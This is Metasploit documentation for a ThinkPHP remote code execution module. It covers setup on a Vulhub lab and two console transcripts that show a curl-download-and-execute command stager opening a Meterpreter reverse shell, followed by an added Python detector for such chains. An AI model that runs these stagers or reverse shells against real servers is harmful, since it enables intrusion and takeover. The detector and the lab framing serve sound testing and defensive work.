## Vulnerable Application

### Description

This module exploits one of two PHP injection vulnerabilities in the ThinkPHP web framework to execute code as the web user. Versions up to and including 5.0.23 are exploitable, though 5.0.23 is affected by a different vulnerability than the earlier versions.

The module will automatically attempt to detect the version of the software.

Tested against versions 5.0.20 and 5.0.23 as can be found on Vulhub.

### Setup

1. `git clone https://github.com/vulhub/vulhub`
2. `cd vulhub/thinkphp/5-rce` for 5.0.20 or `cd vulhub/thinkphp/5.0.23-rce` for 5.0.23
3. `docker-compose up -d`

### Targets

```
Id  Name
--  ----
0   Unix Command
1   Linux Dropper
```

## Verification Steps

Follow [Setup](#setup) and [Scenarios](#scenarios).

## Options

### SRVPORT

If you are testing the [Docker container](#setup), which binds to port 8080 by default, and you are using an HTTP(S) command stager, set this to a different port so that the command stager server does not collide with the container's port.

## Scenarios

### ThinkPHP 5.0.20 from [Vulhub](https://github.com/vulhub/vulhub/tree/master/thinkphp/5-rce)

```
msf5 > use exploit/unix/webapp/thinkphp_rce
msf5 exploit(unix/webapp/thinkphp_rce) > show missing

Module options (exploit/unix/webapp/thinkphp_rce):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:'


Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)

msf5 exploit(unix/webapp/thinkphp_rce) > set rhosts 127.0.0.1
rhosts => 127.0.0.1
msf5 exploit(unix/webapp/thinkphp_rce) > set lhost 192.168.1.3
lhost => 192.168.1.3
msf5 exploit(unix/webapp/thinkphp_rce) > set cmdstager::flavor curl
cmdstager::flavor => curl
msf5 exploit(unix/webapp/thinkphp_rce) > set srvport 8888
srvport => 8888
msf5 exploit(unix/webapp/thinkphp_rce) > run

[*] Started reverse TCP handler on 192.168.1.3:4444
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable. ThinkPHP 5.0.20 is a vulnerable version.
[*] Targeting ThinkPHP 5.0.20 automatically
[*] Using URL: http://0.0.0.0:8888/IV0dIafe
[*] Local IP: http://192.168.1.3:8888/IV0dIafe
[*] Generated command stager: ["curl -so /tmp/UJiMvCsm http://192.168.1.3:8888/IV0dIafe;chmod +x /tmp/UJiMvCsm;/tmp/UJiMvCsm;rm -f /tmp/UJiMvCsm"]
[*] Executing command: curl -so /tmp/UJiMvCsm http://192.168.1.3:8888/IV0dIafe;chmod +x /tmp/UJiMvCsm;/tmp/UJiMvCsm;rm -f /tmp/UJiMvCsm
[*] Client 192.168.1.3 (curl/7.52.1) requested /IV0dIafe
[*] Sending payload to 192.168.1.3 (curl/7.52.1)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3012516 bytes) to 192.168.1.3
[*] Meterpreter session 1 opened (192.168.1.3:4444 -> 192.168.1.3:64475) at 2020-04-13 01:02:13 -0500
[*] Command Stager progress - 100.00% done (112/112 bytes)
[*] Server stopped.

meterpreter > getuid
Server username: no-user @ c94d71fb70ec (uid=33, gid=33, euid=33, egid=33)
meterpreter > sysinfo
Computer     : 172.21.0.2
OS           : Debian 9.4 (Linux 4.19.76-linuxkit)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >
```

### ThinkPHP 5.0.23 from [Vulhub](https://github.com/vulhub/vulhub/tree/master/thinkphp/5.0.23-rce)

```
msf5 exploit(unix/webapp/thinkphp_rce) > set rport 8081
rport => 8081
msf5 exploit(unix/webapp/thinkphp_rce) > run

[*] Started reverse TCP handler on 192.168.1.3:4444
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable. ThinkPHP 5.0.23 is a vulnerable version.
[*] Targeting ThinkPHP 5.0.23 automatically
[*] Using URL: http://0.0.0.0:8888/zD3iTDja
[*] Local IP: http://192.168.1.3:8888/zD3iTDja
[*] Generated command stager: ["curl -so /tmp/XnysdYyf http://192.168.1.3:8888/zD3iTDja;chmod +x /tmp/XnysdYyf;/tmp/XnysdYyf;rm -f /tmp/XnysdYyf"]
[*] Executing command: curl -so /tmp/XnysdYyf http://192.168.1.3:8888/zD3iTDja;chmod +x /tmp/XnysdYyf;/tmp/XnysdYyf;rm -f /tmp/XnysdYyf
[*] Client 192.168.1.3 (curl/7.52.1) requested /zD3iTDja
[*] Sending payload to 192.168.1.3 (curl/7.52.1)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3012516 bytes) to 192.168.1.3
[*] Meterpreter session 2 opened (192.168.1.3:4444 -> 192.168.1.3:64482) at 2020-04-13 01:03:29 -0500
[*] Command Stager progress - 100.00% done (112/112 bytes)
[*] Server stopped.

meterpreter > getuid
Server username: no-user @ 9a6301c3c31d (uid=33, gid=33, euid=33, egid=33)
meterpreter > sysinfo
Computer     : 172.22.0.2
OS           : Debian 9.6 (Linux 4.19.76-linuxkit)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >
```
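From the blue-team side, the most reusable artifact in both transcripts is the command stager itself: a `curl` download to a random `/tmp` name, `chmod +x`, execution of that path, then `rm -f`, all chained in one shell line and run as the web user (uid 33). The following added example, which is not part of the module documentation or of Metasploit, shows a small detection routine that parses such one-liners (as they would appear in process-audit or web-server logs) and flags the download-then-execute chain while ignoring plain downloads or ordinary script runs. The sample command lines are constructed for this example; the first copies the shape of the stager shown above.

```python
import re
import shlex
from dataclasses import dataclass, field

# Sample shell command lines, constructed for this example. The first two copy
# the command-stager chain shape shown in the module transcript; the others are
# benign commands that the rule must not flag.
SAMPLE_COMMANDS = [
    "curl -so /tmp/UJiMvCsm http://192.168.1.3:8888/IV0dIafe;chmod +x /tmp/UJiMvCsm;/tmp/UJiMvCsm;rm -f /tmp/UJiMvCsm",
    "wget -qO /tmp/abc http://198.51.100.7/x && chmod +x /tmp/abc && /tmp/abc; rm -f /tmp/abc",
    "curl -so /tmp/report.csv http://intranet.example/report.csv",
    "chmod +x /usr/local/bin/deploy.sh && /usr/local/bin/deploy.sh",
]

# Shell operators that chain simple commands in a one-liner.
SEPARATOR = re.compile(r"\s*(?:;|&&|\|\||\|)\s*")
DOWNLOADERS = {"curl", "wget"}


@dataclass
class Finding:
    command: str
    dropped_path: str
    stages: list = field(default_factory=list)


def _split_chain(command):
    """Split a one-liner into its individual simple commands."""
    return [c for c in SEPARATOR.split(command) if c]


def _download_target(argv):
    """Return the local output path if argv is a curl/wget download to a file."""
    if not argv or argv[0] not in DOWNLOADERS:
        return None
    for i, arg in enumerate(argv[1:], start=1):
        # curl -o FILE / -so FILE and wget -O FILE / -qO FILE (combined short flags)
        if arg.startswith("-") and not arg.startswith("--") and arg[-1] in "oO":
            if i + 1 < len(argv):
                return argv[i + 1]
        if arg in ("--output", "--output-document"):
            if i + 1 < len(argv):
                return argv[i + 1]
    return None


def detect_drop_and_execute(command):
    """Flag a download -> chmod +x -> execute -> delete chain.

    Returns a Finding when a file downloaded earlier in the same one-liner is
    later executed (the chmod and rm stages are recorded but not required),
    otherwise None.
    """
    stages = []
    dropped = None
    executed = False
    for simple in _split_chain(command):
        try:
            argv = shlex.split(simple)
        except ValueError:  # unbalanced quotes: skip this fragment
            continue
        if not argv:
            continue
        target = _download_target(argv)
        if target and dropped is None:
            dropped = target
            stages.append("download")
            continue
        if dropped is None:
            continue
        if argv[0] == "chmod" and dropped in argv:
            stages.append("chmod")
        elif argv[0] == dropped:
            stages.append("execute")
            executed = True
        elif argv[0] == "rm" and dropped in argv:
            stages.append("cleanup")
    if dropped and executed:
        return Finding(command=command, dropped_path=dropped, stages=stages)
    return None


def scan(commands):
    """Run the detector over a list of command lines and keep the findings."""
    return [f for f in (detect_drop_and_execute(c) for c in commands) if f]


if __name__ == "__main__":
    for f in scan(SAMPLE_COMMANDS):
        print(f.dropped_path, "->", "/".join(f.stages))
```

The rule keys on the relationship between stages (the path written by the downloader is the path later executed) rather than on the random file name or the stager URL, which change on every run. A plain download or an ordinary `chmod +x` of an installed script produces no finding, which keeps the rule usable on busy hosts.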